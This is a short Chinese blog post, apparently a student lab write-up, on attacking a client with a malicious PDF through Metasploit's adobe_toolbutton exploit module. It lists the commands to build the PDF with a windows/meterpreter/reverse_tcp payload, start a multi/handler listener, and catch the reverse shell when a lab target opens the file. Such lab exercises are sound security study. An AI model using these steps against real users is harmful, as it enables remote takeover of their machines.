首页 > 技术文章 > 对客户端攻击:adobe_toolbutton

20145208cy 2017-04-12 17:54 原文

对客户端攻击:adobe_toolbutton

漏洞简介

  • 远程攻击者可以利用漏洞执行任意指令。当用户打开特定pdf就可以触发payload。

实践过程

  • 输入命令use exploit/windows/fileformat/adobe_toolbutton使用该模块,然后使用set payload windows/meterpreter/reverse_tcp设置回连,show options检查设置信息并补全,最后exploit生成文件,文件在显示的目录下:

  • 建立监听use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp,然后exploit开启监听,同时在靶机点开pdf:

  • 可以看到回连成功

推荐阅读